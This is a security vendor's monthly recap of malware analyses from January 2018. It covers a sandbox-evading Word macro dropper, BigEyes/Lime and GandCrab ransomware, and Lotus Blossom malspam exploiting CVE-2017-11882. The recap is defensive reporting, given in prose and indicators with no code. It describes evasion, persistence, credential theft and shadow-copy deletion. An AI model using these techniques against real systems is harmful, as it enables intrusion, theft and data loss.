Welcome to the VMRay Malware Analysis Report Recap. Every month our Research Team provides a recap of the malware analysis reports posted to the VMRay Twitter account. This past January, our team analyzed a variant of BigEyes/Lime ransomware, GandCrab ransomware and Lotus Blossom malspam.
Click the links below to jump to a specific report:
- Malicious Word Doc Uses Multiple Sandbox Evasion Techniques
- BigEyes/Lime Ransomware Drops Decryption Key to C:\microsoft\hash in Plaintext
- GandCrab Ransomware
- Lotus Blossom Malspam
January 10, 2018
This malicious Word document uses several techniques to detect the presence of security tools such as Sandboxes and Anti-virus software. All of these techniques are detected by VMRay Analyzer and listed as potential threats in the VTI section of the report (Figure 1).
In the Network Tab (Figure 2), we can see the Word document using a VBA Macro to connect to a known malicious domain and Dropbox (using bitsadmin) to download the payload.
The payload uses common techniques like process injection and adding an entry into the Windows startup for persistence. Both of these can be seen in the process graph (Figure 3), with persistence resulting in an automatic reboot.
The malware then goes on to steal credentials from Mozilla Firefox, Google Chrome and Internet Explorer as well as system data (Figure 4).
January 17, 2018
BigEyes/Lime ransomware is written in .NET and directly starts to encrypt the files on the computer. To be quick it only encrypts files of the current user. This means that only files in the Documents, Pictures, Music, Videos and Desktop folders are affected.
Every encrypted file gets the suffix “.lime” and the system wallpaper displays the ransom note.
The ransom note demands 100$ in Bitcoin for the decryption key. This key is needed for the program named “#Decryptor.exe” (shown in figure 7) which is dropped to the desktop and decrypts the encrypted files. However, our analysis shows that the decryption key is also dropped in “C:\microsoft\hash” in plain text. The malware authors made it relatively easy to decrypt the files without paying the ransom.
Report Name: GandCrab Ransomware
January 26, 2018
This file exhibits typical ransomware behavior i.e. it encrypts all files on the user’s system and demands a ransom payment for the decoder key. To ensure that the user cannot restore files, it deletes all snapshots created by the Volume Shadow Copy Service.
All encrypted files have the suffix “.GDCB” as shown in the accompanying figure.
The ransom note with further instructions on how to decrypt the user’s files is shown after a reboot.
Report Name: Lotus Blossom Malspam
January 31, 2018
This malware uses the CVE-2017-11882 vulnerability, which is an MS Word exploit. This exploit allows the malware authors to run their own program code instead of the original. In this scenario, a DLL is dropped in “\appdata\roaming\microsoft\windows\chaches\navshext.dll” and injected into the browser (Internet Explorer).
The filename “navshext.dll” suggests that the file is a legitimate DLL from Norton Security Antivirus software. After injection, the DLL checks if its run in a debugger and creates a mutex “donotbotherme”.
It then proceeds to create a system startup routine.
Next, the malware tries to connect to its Command and Control (C2) Server. If this isn’t successful the malware will sleep forever (roughly 19 years). If it is successful it uploads information about the victim’s system and waits for commands.
All of these behavior patterns are indicators of an Information Stealer or a Trojan. Some analysts have concluded this is part of a targeted attack against ASEAN members.